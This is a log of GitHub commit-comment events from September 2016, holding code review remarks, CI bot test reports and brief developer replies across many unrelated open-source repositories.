{"id":"4558819294","type":"CommitCommentEvent","actor":{"login":"calaway"},"repo":{"name":"bfpepper/little-shop"},"payload":{"comment":{"id":19010409,"position":null,"line":null,"path":null,"commit_id":"d90313453582a52e4d3a6329cc8a42f93f031015","created_at":"2016-09-13T22:57:53Z","updated_at":"2016-09-13T22:57:53Z","body":"We've decided to abandon this branch, since we're changing the basic functionality of what we sell on our retail site. We're going to keep this branch around so we can reference the code written in it.\r\n\r\n@brendandillon, take a look and let me know if you see any problem with this. Thanks!"}},"created_at":"2016-09-13T22:57:53Z"}
{"id":"4558826081","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":19010429,"position":null,"line":null,"path":null,"commit_id":"2059503af2a41eb940ca79b39a09c35fa37d9b6d","created_at":"2016-09-13T22:59:31Z","updated_at":"2016-09-13T22:59:31Z","body":"James, I hope you tested it this time :)"}},"created_at":"2016-09-13T22:59:31Z"}
{"id":"4558829792","type":"CommitCommentEvent","actor":{"login":"rcoder"},"repo":{"name":"rcoder/kafka-pixy"},"payload":{"comment":{"id":19010438,"position":20,"line":45,"path":"main.go","commit_id":"3b370c652fb282eded68cb5931b7920f4611b6ed","created_at":"2016-09-13T23:00:27Z","updated_at":"2016-09-13T23:00:27Z","body":"Seems like a strictly better pattern in the case where we want to support arbitrarily large or small intervals, though I'm not sure values expressed in anything other than milliseconds will be useful for this flag.\r\n\r\nI could go either way of course, and it would have the advantage of removing the random int->duration munging code elsewhere."}},"created_at":"2016-09-13T23:00:27Z"}
{"id":"4558830003","type":"CommitCommentEvent","actor":{"login":"SpeedyDanny"},"repo":{"name":"nilzao/soapbox-race-udp"},"payload":{"comment":{"id":19010439,"position":null,"line":null,"path":null,"commit_id":"2c3b4d18a22876e6ee1b12108ec045ebf83e0a1d","created_at":"2016-09-13T23:00:30Z","updated_at":"2016-09-13T23:00:30Z","body":"so the file its java format. and inside the file are only codes...ok now i understand...(i think)"}},"created_at":"2016-09-13T23:00:30Z"}
{"id":"4558831220","type":"CommitCommentEvent","actor":{"login":"ginkel"},"repo":{"name":"ansible/ansible-modules-core"},"payload":{"comment":{"id":19010443,"position":156,"line":973,"path":"source_control/git.py","commit_id":"e4f40d1cdda9161849098bfeac9d360fe9dd77f3","created_at":"2016-09-13T23:00:47Z","updated_at":"2016-09-13T23:00:47Z","body":"This will fail with `UnboundLocalError: local variable 'remote_head' referenced before assignment` for some code paths."}},"created_at":"2016-09-13T23:00:47Z"}
{"id":"4558838516","type":"CommitCommentEvent","actor":{"login":"nelhage"},"repo":{"name":"rcoder/kafka-pixy"},"payload":{"comment":{"id":19010469,"position":20,"line":45,"path":"main.go","commit_id":"3b370c652fb282eded68cb5931b7920f4611b6ed","created_at":"2016-09-13T23:02:40Z","updated_at":"2016-09-13T23:02:40Z","body":"Yeah, I don't imagine passing anything other than `ms`, but it (a) removes the conversion code, and (b) makes the units explicit on invokers.\r\n\r\nNo strong feelings either way."}},"created_at":"2016-09-13T23:02:40Z"}
{"id":"4558843746","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"node-machine/machine"},"payload":{"comment":{"id":19010489,"position":null,"line":null,"path":null,"commit_id":"b573e3348bcfead55b1ed30f5963fd3b92718b2c","created_at":"2016-09-13T23:03:59Z","updated_at":"2016-09-13T23:03:59Z","body":"### More info\r\n\r\nIn machine@13.0.0, `env.thisMachine()` will be deprecated for performance reasons.  It may return in the future, but for now, it's best to use a recursive self-calling function.  Hit me up [@mikermcneil](http://twitter.com/mikermcneil) if you need help with the migration on this one-- it wasn't widely used for recursion, so more likely than not what you're actually interested is maintaining support for code that _used this for maintainability reasons_ (i.e. making dynamic error messages more change-tolerant by having them use your exit descriptions or input friendly names, etc.)"}},"created_at":"2016-09-13T23:03:59Z"}
{"id":"4558849044","type":"CommitCommentEvent","actor":{"login":"nooshinm"},"repo":{"name":"openshopio/openshop.io-android"},"payload":{"comment":{"id":19010498,"position":17,"line":11,"path":"app/build.gradle","commit_id":"98ff5f80dd42515353bc4142b6c26398ab7de6ee","created_at":"2016-09-13T23:05:14Z","updated_at":"2016-09-13T23:05:14Z","body":"B"}},"created_at":"2016-09-13T23:05:14Z"}
{"id":"4558853594","type":"CommitCommentEvent","actor":{"login":"ayumi"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19010511,"position":null,"line":null,"path":null,"commit_id":"e4667bb51f23081796ea445946ea095585e0a5bf","created_at":"2016-09-13T23:06:23Z","updated_at":"2016-09-13T23:06:23Z","body":"thanks! i like that idea"}},"created_at":"2016-09-13T23:06:23Z"}
{"id":"4558859107","type":"CommitCommentEvent","actor":{"login":"MarcyNash"},"repo":{"name":"MarcyNash/MarcyNash.github.io"},"payload":{"comment":{"id":19010527,"position":null,"line":null,"path":null,"commit_id":"723162f16fd50a81a73e3c476ae2c66dba11fca1","created_at":"2016-09-13T23:07:51Z","updated_at":"2016-09-13T23:07:51Z","body":"Test Website"}},"created_at":"2016-09-13T23:07:51Z"}
{"id":"4558861720","type":"CommitCommentEvent","actor":{"login":"LucasVilela"},"repo":{"name":"LucasVilela/WDi16-Homework"},"payload":{"comment":{"id":19010538,"position":null,"line":null,"path":null,"commit_id":"bf5cd08e4ecf3e729ca37e7a51d8c4a856aa0681","created_at":"2016-09-13T23:08:34Z","updated_at":"2016-09-13T23:08:34Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Y8cmXEqP&#x2F;12-ok\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> ok</a>"}},"created_at":"2016-09-13T23:08:34Z"}
{"id":"4558862295","type":"CommitCommentEvent","actor":{"login":"SnowCrestGuy"},"repo":{"name":"trueos/trueos-core"},"payload":{"comment":{"id":19010539,"position":null,"line":null,"path":null,"commit_id":"c9f188e05ab3ef0204db7fae40279f97c6703b0b","created_at":"2016-09-13T23:08:43Z","updated_at":"2016-09-13T23:08:43Z","body":"Excellent, to bad the magic smoke escaped my older AMD system. I woke up to find a warm corpse during testing a few days ago. An AMD A12 is in the works and I look forward to help. "}},"created_at":"2016-09-13T23:08:43Z"}
{"id":"4558862607","type":"CommitCommentEvent","actor":{"login":"Kubuxu"},"repo":{"name":"ipfs/ipget"},"payload":{"comment":{"id":19010540,"position":5,"line":10,"path":"package.json","commit_id":"961c333b8e864f373a2daef15a3e57f56a40e927","created_at":"2016-09-13T23:08:48Z","updated_at":"2016-09-13T23:08:48Z","body":"Sorry, we have noticed that deps weren't accessible and there wasn't much development lately. Just wanted to try patch things up a bit."}},"created_at":"2016-09-13T23:08:48Z"}
{"id":"4558864523","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19010543,"position":null,"line":null,"path":null,"commit_id":"d34f2f7b7dd7d5209238d2ab09117dfd3fd61993","created_at":"2016-09-13T23:09:21Z","updated_at":"2016-09-13T23:09:21Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: Tests Failed (2166 of 2467 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d34f2f7b7dd7d5209238d2ab09117dfd3fd61993-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d34f2f7b7dd7d5209238d2ab09117dfd3fd61993-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-87.8%25-red.svg)</a> \n"}},"created_at":"2016-09-13T23:09:21Z"}
{"id":"4558865935","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19010545,"position":null,"line":null,"path":null,"commit_id":"f8be1c655b90e6334706793f6ac016448af1df0b","created_at":"2016-09-13T23:09:43Z","updated_at":"2016-09-13T23:09:43Z","body":"What about http://www.wowhead.com/spell=32747/interrupt as suggested in https://github.com/ElunaLuaEngine/ElunaTrinityWotlk/blob/master/src/server/game/Spells/Spell.h#L221 ?"}},"created_at":"2016-09-13T23:09:43Z"}
{"id":"4558866216","type":"CommitCommentEvent","actor":{"login":"imax64"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":19010546,"position":null,"line":null,"path":null,"commit_id":"f60e04a7ceca1d9ad75f6b1f2386a05cc463f90d","created_at":"2016-09-13T23:09:48Z","updated_at":"2016-09-13T23:09:48Z","body":"works for me as well"}},"created_at":"2016-09-13T23:09:48Z"}
{"id":"4558875013","type":"CommitCommentEvent","actor":{"login":"nickdrozd"},"repo":{"name":"nickdrozd/lispinc"},"payload":{"comment":{"id":19010564,"position":null,"line":null,"path":null,"commit_id":"08fd9ec34520c56e9247b7c7b0f06c10bf34f643","created_at":"2016-09-13T23:12:10Z","updated_at":"2016-09-13T23:12:10Z","body":"Those numbers are from non-tail mode. The tail numbers are:\r\n(recursive_fibonacci_interpreted 10)\r\nTotal number of saves: 5030\r\nMaximum stack depth: 55\r\nTotal syntax checks: 17925\r\n"}},"created_at":"2016-09-13T23:12:10Z"}
{"id":"4558889804","type":"CommitCommentEvent","actor":{"login":"MysticHLE"},"repo":{"name":"dezede/dezede"},"payload":{"comment":{"id":19010614,"position":null,"line":null,"path":null,"commit_id":"ed13ccaf34494e71fd913fd785c229052f6acdc8","created_at":"2016-09-13T23:16:12Z","updated_at":"2016-09-13T23:16:12Z","body":"Clean and clever hack/override of the template. Thanks a lot! 👍 "}},"created_at":"2016-09-13T23:16:12Z"}
{"id":"4558896493","type":"CommitCommentEvent","actor":{"login":"andrewc12"},"repo":{"name":"andrewc12/debian-playbooks"},"payload":{"comment":{"id":19010636,"position":null,"line":null,"path":null,"commit_id":"5d5a0a2d390ec6c04ebdacc0b0a0f2ba5152159c","created_at":"2016-09-13T23:17:52Z","updated_at":"2016-09-13T23:17:52Z","body":"I was just learning to play with ansible the only reason I pushed it to\nGitHub was so that I could clone it to a a vagrant box.\nI really should get rid of it or make it private.\nAlso ive seen that repo before it's nice.\nRegards\n\nOn 13 Sep 2016 12:13 AM, \"n0p\" <notifications@github.com> wrote:\n\n> What are you trying to accomplish with this role?\n> This will fail on debian boxes.\n> I think it's better to separate this into a different playbook, don't you\n> think so?\n>\n> Take a look here:\n> https://github.com/lefant/ansible-openwrt\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/andrewc12/debian-playbooks/commit/5d5a0a2d390ec6c04ebdacc0b0a0f2ba5152159c#commitcomment-18987287>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACKHXDeMA4HOxvKzSzHwSAp0GuQV2Utdks5qpXorgaJpZM4J6whg>\n> .\n>\n"}},"created_at":"2016-09-13T23:17:52Z"}
{"id":"4558896769","type":"CommitCommentEvent","actor":{"login":"clyfe"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19010638,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-13T23:17:57Z","updated_at":"2016-09-13T23:17:57Z","body":"```\r\nhttp://example.com?field[0]=a&field[1]=b&field[2]=c\r\nhttp://example.com?field[]=a&field[]=b&field[]=c\r\nhttp://example.com?field=a&field=b&field=c\r\n```\r\n\r\nAll of these should probably be equivalent, and supported.\r\nI found the first two more common, that may vary depending on stack."}},"created_at":"2016-09-13T23:17:57Z"}
{"id":"4558903381","type":"CommitCommentEvent","actor":{"login":"briankung"},"repo":{"name":"briankung/projectcredo"},"payload":{"comment":{"id":19010655,"position":5,"line":37,"path":"config/initializers/devise.rb","commit_id":"f1e021a4a686f1c3e2ed35ec58fa2814489047ac","created_at":"2016-09-13T23:19:48Z","updated_at":"2016-09-13T23:19:48Z","body":"Why is this plural now?"}},"created_at":"2016-09-13T23:19:48Z"}
{"id":"4558904187","type":"CommitCommentEvent","actor":{"login":"ljmf00"},"repo":{"name":"Ev1lbl0w/Strategy-Client"},"payload":{"comment":{"id":19010658,"position":null,"line":null,"path":null,"commit_id":"1a3739b2dac7b573b67147f9463abba0020e55ec","created_at":"2016-09-13T23:20:02Z","updated_at":"2016-09-13T23:20:02Z","body":"Good! Nice to see that implementation..."}},"created_at":"2016-09-13T23:20:02Z"}
{"id":"4558907331","type":"CommitCommentEvent","actor":{"login":"ch0rus"},"repo":{"name":"CyanogenMod/android_device_xiaomi_gemini"},"payload":{"comment":{"id":19010668,"position":null,"line":null,"path":null,"commit_id":"c9d477fece3853195a04afeb7eeb4c4d5aeca168","created_at":"2016-09-13T23:20:51Z","updated_at":"2016-09-13T23:20:51Z","body":"Of course official CM key layout should match stock phone key layout...?"}},"created_at":"2016-09-13T23:20:51Z"}
{"id":"4558913537","type":"CommitCommentEvent","actor":{"login":"joelittlejohn"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19010680,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-13T23:22:30Z","updated_at":"2016-09-13T23:22:30Z","body":"I think the second is PHP style. The third applies to Java servlet containers (amongst other places), which is why I think it's the best default for a Clojure http library. It's also the original behaviour of clj-http until this change, so I think there's a strong case for re-instating the third on your list as the default.\r\n\r\nDo you have an example of the first option in use? Is there any community that uses that?"}},"created_at":"2016-09-13T23:22:30Z"}
{"id":"4558913817","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19010682,"position":null,"line":null,"path":null,"commit_id":"69c685c242f9be19d8e1f66481a2c106ab588ea6","created_at":"2016-09-13T23:22:35Z","updated_at":"2016-09-13T23:22:35Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1189 of 1189 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-13T23:22:35Z"}
{"id":"4558915018","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19010684,"position":null,"line":null,"path":null,"commit_id":"c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7","created_at":"2016-09-13T23:22:53Z","updated_at":"2016-09-13T23:22:53Z","body":"empd_bugfix (nmerket) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-13T23:22:53Z"}
{"id":"4558918462","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19010689,"position":null,"line":null,"path":null,"commit_id":"c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7","created_at":"2016-09-13T23:23:50Z","updated_at":"2016-09-13T23:23:50Z","body":"empd_bugfix (nmerket) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-13T23:23:50Z"}
{"id":"4558921642","type":"CommitCommentEvent","actor":{"login":"quantum5"},"repo":{"name":"DMOJ/site"},"payload":{"comment":{"id":19010697,"position":null,"line":null,"path":null,"commit_id":"69799dd4be192308a7e5417a5e3a8ad45d9224c8","created_at":"2016-09-13T23:24:41Z","updated_at":"2016-09-13T23:24:41Z","body":"Why did you change this? If you are superuser, has_perm returns `True` unconditionally anyway.\r\n\r\n```python\r\ndef has_perm(self, perm, obj=None):\r\n    # ...\r\n    if self.is_active and self.is_superuser:\r\n        return True\r\n```"}},"created_at":"2016-09-13T23:24:41Z"}
{"id":"4558927879","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"google/guava"},"payload":{"comment":{"id":19010711,"position":null,"line":null,"path":null,"commit_id":"112e7eb1358ab4bcbaea7a61e195fba29b7e0d13","created_at":"2016-09-13T23:26:20Z","updated_at":"2016-09-13T23:26:20Z","body":"Okay, that more or less makes sense to me.\r\n\r\nI came to the same conclusion myself regarding the fact that a transitive closure is a set of cliques, when I stepped through the `transitiveClosure` method on paper.\r\n(Incidentally, it was stepping through the method on paper which allowed me to discover the optimisation that @Bezier89 kindly implemented here for me :smiley:)\r\n\r\nI don't yet see how one can calculate a complete graph from a connected component in O(m) time, but I trust you do, so I wish you best of luck with implementing this even better optimisation."}},"created_at":"2016-09-13T23:26:20Z"}
{"id":"4558928232","type":"CommitCommentEvent","actor":{"login":"Xyene"},"repo":{"name":"DMOJ/site"},"payload":{"comment":{"id":19010712,"position":null,"line":null,"path":null,"commit_id":"69799dd4be192308a7e5417a5e3a8ad45d9224c8","created_at":"2016-09-13T23:26:25Z","updated_at":"2016-09-13T23:26:25Z","body":"Because it's in an `and` clause, and the right side of it was evaluating to `False` as a superuser."}},"created_at":"2016-09-13T23:26:25Z"}
{"id":"4558930900","type":"CommitCommentEvent","actor":{"login":"Artoria2e5"},"repo":{"name":"The-Orizon/nlputils"},"payload":{"comment":{"id":19010722,"position":6,"line":5,"path":"gbk_pua.py","commit_id":"b351e6d7a4092fe8096d104c8362877fd07d540d","created_at":"2016-09-13T23:27:10Z","updated_at":"2016-09-13T23:27:10Z","body":"12 chars???"}},"created_at":"2016-09-13T23:27:10Z"}
{"id":"4558935084","type":"CommitCommentEvent","actor":{"login":"ragesoss"},"repo":{"name":"WikiEducationFoundation/WikiEduDashboard"},"payload":{"comment":{"id":19010725,"position":33,"line":37,"path":"app/assets/javascripts/stores/alerts_store.js","commit_id":"de97bd929d48fbc78b5891c5a3b6b1b0f2a6bafd","created_at":"2016-09-13T23:28:18Z","updated_at":"2016-09-13T23:28:18Z","body":"Cool! Figuring out how to reference AlertsStore in this context was what I was missing."}},"created_at":"2016-09-13T23:28:18Z"}
{"id":"4558939133","type":"CommitCommentEvent","actor":{"login":"tomkersten"},"repo":{"name":"DanTheMan0000/koa-hello-world"},"payload":{"comment":{"id":19010741,"position":null,"line":null,"path":null,"commit_id":"7954124af41cb552b72b845a3be654a6e4da6940","created_at":"2016-09-13T23:29:22Z","updated_at":"2016-09-13T23:29:22Z","body":"looks good.\r\n\r\ntry uzsing a font from google fonts and we'll call this one done."}},"created_at":"2016-09-13T23:29:22Z"}
{"id":"4558950761","type":"CommitCommentEvent","actor":{"login":"JoneStones01"},"repo":{"name":"JoneStones01/ProjetoTesteTDST2"},"payload":{"comment":{"id":19010773,"position":null,"line":null,"path":null,"commit_id":"abc1aaadd8d53d59ce70695b489eb310c7d9ca40","created_at":"2016-09-13T23:32:24Z","updated_at":"2016-09-13T23:32:24Z","body":"lalala laalla laalal"}},"created_at":"2016-09-13T23:32:24Z"}
{"id":"4558951871","type":"CommitCommentEvent","actor":{"login":"LoganBarnett123"},"repo":{"name":"dtyoung/SCARA-ARM"},"payload":{"comment":{"id":19010776,"position":null,"line":null,"path":null,"commit_id":"782df04439aaf701340bce73955b37a122995482","created_at":"2016-09-13T23:32:41Z","updated_at":"2016-09-13T23:32:41Z","body":"Yo, sick commit bro, keep up the good work"}},"created_at":"2016-09-13T23:32:41Z"}
{"id":"4558962291","type":"CommitCommentEvent","actor":{"login":"jxmorris12"},"repo":{"name":"cavdailyonline/thecavalierdani"},"payload":{"comment":{"id":19010807,"position":null,"line":null,"path":null,"commit_id":"3bca91bcf2dd43508f5e1021ee77515d2f84a66d","created_at":"2016-09-13T23:35:34Z","updated_at":"2016-09-13T23:35:34Z","body":"nice"}},"created_at":"2016-09-13T23:35:34Z"}
{"id":"4558963241","type":"CommitCommentEvent","actor":{"login":"jnothman"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":19010810,"position":19,"line":596,"path":"sklearn/model_selection/_validation.py","commit_id":"8cfebf2e63b1369ee0caba93cbdd887b369dab50","created_at":"2016-09-13T23:35:48Z","updated_at":"2016-09-13T23:35:48Z","body":"cross_val_score does the cloning"}},"created_at":"2016-09-13T23:35:48Z"}
{"id":"4558963405","type":"CommitCommentEvent","actor":{"login":"jnothman"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":19010811,"position":21,"line":598,"path":"sklearn/model_selection/_validation.py","commit_id":"8cfebf2e63b1369ee0caba93cbdd887b369dab50","created_at":"2016-09-13T23:35:52Z","updated_at":"2016-09-13T23:35:52Z","body":"shuflled -> shuffled"}},"created_at":"2016-09-13T23:35:52Z"}
{"id":"4558963533","type":"CommitCommentEvent","actor":{"login":"jnothman"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":19010812,"position":24,"line":601,"path":"sklearn/model_selection/_validation.py","commit_id":"8cfebf2e63b1369ee0caba93cbdd887b369dab50","created_at":"2016-09-13T23:35:54Z","updated_at":"2016-09-13T23:35:54Z","body":"indentation"}},"created_at":"2016-09-13T23:35:54Z"}
{"id":"4558963629","type":"CommitCommentEvent","actor":{"login":"jnothman"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":19010813,"position":30,"line":607,"path":"sklearn/model_selection/_validation.py","commit_id":"8cfebf2e63b1369ee0caba93cbdd887b369dab50","created_at":"2016-09-13T23:35:55Z","updated_at":"2016-09-13T23:35:55Z","body":"You can just use -1 instead of n_splits."}},"created_at":"2016-09-13T23:35:55Z"}
{"id":"4558964269","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19010817,"position":null,"line":null,"path":null,"commit_id":"69c685c242f9be19d8e1f66481a2c106ab588ea6","created_at":"2016-09-13T23:36:06Z","updated_at":"2016-09-13T23:36:06Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-13T23:36:06Z"}
{"id":"4558968754","type":"CommitCommentEvent","actor":{"login":"darkjav"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19010831,"position":null,"line":null,"path":null,"commit_id":"782edece51565b5f5c728852947b0f6df6c8affb","created_at":"2016-09-13T23:37:16Z","updated_at":"2016-09-13T23:37:16Z","body":"What about client 10.98, is the same thing that 10.97?"}},"created_at":"2016-09-13T23:37:16Z"}
{"id":"4558969200","type":"CommitCommentEvent","actor":{"login":"ishustava"},"repo":{"name":"oozie/fsnotify"},"payload":{"comment":{"id":19010832,"position":null,"line":null,"path":null,"commit_id":"270485b8b02987f01abf1245d2da224d8cd40930","created_at":"2016-09-13T23:37:24Z","updated_at":"2016-09-13T23:37:24Z","body":"Hi @oozie,\r\n\r\nWe have some feedback about the test: \r\n\r\n- It seems not all cases are covered or that the code was not test-driven. For instance, if I remove lines 40-42, will the test still pass? Maybe, consider a function that will go over all possible permutations of Op codes/values.\r\n- We were wondering why you decided no to use ginkgo. It may help you create more readable BDD-style tests. \r\n- You may wish to remove the copyright information in the test file. \r\n\r\nOther than that, the code looks fine to us.\r\n\r\nPlease let us know if you have any questions.\r\n\r\n@ishustava && @pivotal-stuart-pollock\r\n"}},"created_at":"2016-09-13T23:37:24Z"}
{"id":"4558979840","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"fritsvanveen/QGIS"},"payload":{"comment":{"id":19010869,"position":null,"line":null,"path":null,"commit_id":"eb0eb126be659c9aa5d1ecbde5ab499dfb494543","created_at":"2016-09-13T23:40:30Z","updated_at":"2016-09-13T23:40:30Z","body":"@fritsvanveen sorry - been busy and forgot to reply! \r\n\r\n> Selecting 'Label every part of multi-part features' shows the missing labels. This is not correct as the visual box should not influence the multi-part aspect of a feature, but it makes the bug less severe. Shall I create an issue for this bug?\r\n\r\nThis relates to https://github.com/qgis/QGIS/pull/3403 - however that PR is incomplete as in its current state does not address non curved perimeter labels. \r\n\r\n> At a distance of 1mm the red outlines turn black.\r\n\r\nOK - what's happening here is that with a distance of 0mm the labels from one polygon are being marked as clashing with the neighbouring polygon's boundary (since they touch, or potentially even overlap depending on the layer's topological validity). I'm not sure what the best way to fix this is. Potentially we could have a minimum threshold for label->polygon overlap for it to be considered colliding with an obstacle, but last time I attempted this (using GEO's intersection to get the overlap between the label candidate and the potential overlapping polygon) the performance hit was too large for it to be usable. Maybe there's a more optimised approach though."}},"created_at":"2016-09-13T23:40:30Z"}
{"id":"4558981702","type":"CommitCommentEvent","actor":{"login":"nooshinm"},"repo":{"name":"openshopio/openshop.io-android"},"payload":{"comment":{"id":19010878,"position":4,"line":5,"path":"app/build.gradle","commit_id":"b8b955347c94cd7c6f33b6958422dcd5689e73b6","created_at":"2016-09-13T23:41:02Z","updated_at":"2016-09-13T23:41:02Z","body":"3"}},"created_at":"2016-09-13T23:41:02Z"}
{"id":"4558982224","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"fritsvanveen/QGIS"},"payload":{"comment":{"id":19010879,"position":null,"line":null,"path":null,"commit_id":"eb0eb126be659c9aa5d1ecbde5ab499dfb494543","created_at":"2016-09-13T23:41:11Z","updated_at":"2016-09-13T23:41:11Z","body":"@fritsvanveen is this commit good to merge? Can you open a PR so that the Travis tests can run?"}},"created_at":"2016-09-13T23:41:11Z"}
{"id":"4558989761","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":19010900,"position":null,"line":null,"path":null,"commit_id":"0fe3cb0840fed21709b839d503cc2684ee2cef21","created_at":"2016-09-13T23:43:21Z","updated_at":"2016-09-13T23:43:21Z","body":"@mauritsvanrees Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/45/violations\n```\nplone/namedfile/file.py:291:1: C901 'getImageInfo' is too complex (15)\nplone/namedfile/scaling.py:173:1: C901 'DefaultImageScalingFactory.__call__' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-13T23:43:21Z"}
{"id":"4558992491","type":"CommitCommentEvent","actor":{"login":"copumpkin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19010907,"position":null,"line":null,"path":null,"commit_id":"28a0da5edc23b8af5396f1725a05965a81ab3513","created_at":"2016-09-13T23:44:10Z","updated_at":"2016-09-13T23:44:10Z","body":"It was, thanks!"}},"created_at":"2016-09-13T23:44:10Z"}
{"id":"4558994034","type":"CommitCommentEvent","actor":{"login":"juggernautsei"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":19010910,"position":35,"line":35,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-13T23:44:35Z","updated_at":"2016-09-13T23:44:35Z","body":"I had another developer working on the WSDL and he is unfamiliar with the program and I added the globals.php so that in the near future I can replace the stuff he did with program standard notation. "}},"created_at":"2016-09-13T23:44:35Z"}
